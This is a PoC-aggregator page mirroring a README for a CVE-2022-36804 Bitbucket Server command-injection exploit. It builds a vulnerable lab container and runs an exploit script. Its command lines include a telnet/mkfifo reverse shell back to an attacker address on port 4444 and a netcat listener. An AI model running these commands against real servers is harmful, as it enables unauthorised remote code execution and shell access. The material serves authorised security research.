CVE-2022-36804 PoC — Atlassian Bitbucket Server 安全漏洞

Source

https://github.com/asepsaepdin/CVE-2022-36804

Associated Vulnerability

Title:Atlassian Bitbucket Server 安全漏洞 (CVE-2022-36804)
Description:Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.

Readme

<h1 style="font-size:10vw" align="left">CVE-2022-36804 - Atlassian Bitbucket Server and Data Center Command Injection Vulnerability</h1>


<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg)](https://www.python.org/) <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">


******
⚠️ *For educational and authorized security research purposes only*


## Original Exploit Authors
Very grateful to the original PoC author [Walnut Security Services Pvt. Ltd](https://github.com/walnutsecurity)


## Description
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.


******
## Step Guides
1. First, clone the repository
    ```bash
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    ```
    
2. Change directory
    ```bash
    cd CVE-2022-36804
    ```
    
3. Build vuln container
    ```bash
    docker build -t CVE-2022-36804 .
    ```
    
5. Run ephemeral container
    ```bash
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    ```
    
6. Check container ip address
    ```bash
    docker inspect CVE-2022-36804 | grep "IPAddress"
    ```
    
7. Setup Atlassian bitbucket and create new public repository by open URL: `http://172.17.0.3:7990`

8. Check for Remote Code Execution (RCE)
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    ```
    
9. Check for RCE with customized command (cmd)
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    ```
    
10. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a telnet reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    ```
    ```bash
    nc -nlvp 4444
    ```
    
 
******
## Credits
- https://github.com/walnutsecurity/cve-2022-36804
- https://nvd.nist.gov/vuln/detail/cve-2022-36804

File Snapshot


 [4.0K]  /data/pocs/9d39116974192f85883339d91d29b5fce0b64b7a
├── [6.5K]  cve-2022-36804.py
├── [ 443]  Dockerfile
└── [2.6K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!